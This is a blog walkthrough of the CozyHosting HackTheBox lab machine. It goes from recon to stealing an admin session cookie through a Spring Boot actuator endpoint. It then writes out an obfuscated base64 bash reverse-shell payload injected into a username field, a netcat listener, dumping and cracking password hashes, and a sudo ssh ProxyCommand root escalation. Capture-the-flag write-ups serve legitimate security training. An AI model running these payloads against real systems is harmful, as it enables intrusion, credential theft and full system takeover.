HackTheBox (CozyHosting)

Kenqz,Sun Nov 05 2023•penetration testing

This walkthrough is for the CozyHosting HackTheBox machine (opens in a new tab) from HackTheBox.

Target

COzyHosting logo

CozyHosting is an Ubuntu system that is hosting a Spring Boot Web Application. In the following demonstration, we are starting the attack with a simple nmap scan to search for any open ports.

The nmap results are the following:

22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: nginx/1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://cozyhosting.htb Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nothing interesting, lets move forward.

Gobuster scan:

/index (Status: 200) [Size: 12706]
/login (Status: 200) [Size: 4431]
/admin (Status: 401) [Size: 97]
/logout (Status: 204) [Size: 0]
/error (Status: 500) [Size: 73] <---

We found the error route which prints a "Whitelabel Error Page", default for Spring Boot Web applications. Therefore, this application is running Spring Boot.

Actuator endpoints in spring boot applications:

reference: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/spring-actuators (opens in a new tab)

Afterwards, we can navigate to /actuators/sessions actuator route in our application and compromise the session cookie of administrator. Using BurpSuite, we can intercept the request and inject the cookie for us to access the admin panel.

In the admin panel, we are presented with the following user interface:

Alt text

We successfully logged in as K. Anderson our administrator.

At the bottom of the page, 2 input fields are provided which allows administrator to include a host for automatic patching. From a penetration tester perspective, we can use the fields in order to inject a malicious payload and obtain a reverse shell. Afterwards, we can ssh into the machine with credentials.

Payload can be injected through the username input field with the BurpSuite program.

Now, we can use the following payload:

echo "bash -i >& /dev/tcp/<your-ip>/<your-port> 0>&1" | base64 -w 0

echo${IFS%??}"<insert payload here>"${IFS%??}|${IFS%??}base64${IFS%??}-d${IFS%??}|${IFS%??}bash;

*Note: Payload injection can be executed through the input fields without using BurpSuite

Then, we start a netcat listener:

nc -nvlp 9001 (any port)

I have chosen 9001 port, the previous payload needs to be modified according to our port.

echo "bash -i >& /dev/tcp/10.10.23.253/9001 0>&1" | base64 -w 0

Optional - create a stable shell with the bash script:

python3 -c 'import pty;pty.spawn("/bin/bash")' export TERM=xterm ctrl + z stty raw -echo; fg

Now, we have a stable reverse shell.

Listing the directory with ls, we can find a .tar file.

Proceed to download the file on your local machine
wget http://<your ip>/<file_name>
The file is successfully downloaded

Opening the downloaded file with jd-gui

jd-gui <file_name>
navigating to classes then templates we can find important application.properties configuration file
the file contains postgresql configuration and we can proceed to connect
psql -h 127.0.0.1 -U postgres
select * from users;

Woola!, we got our user hashes!

We can crack the admin hash using john with rockyou.txt combo list.
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
using the password, we can ssh into user josh
ssh josh@cozyhosting.htb

After successfully connecting as a user josh, we can use privilege escalation to obtain root.

sudo -l
"User josh may run the following commands on localhost: (root) /usr/bin/ssh"
Therefore, we can execute the following GTFOBINS payload to escalate to root : sudo ssh -o ProxyCommand=';sh 0<&2 1>&2'
whoami
cat /root/root.txt
Pwned.

Payload reference: https://gtfobins.github.io/gtfobins/ssh/#sudo (opens in a new tab)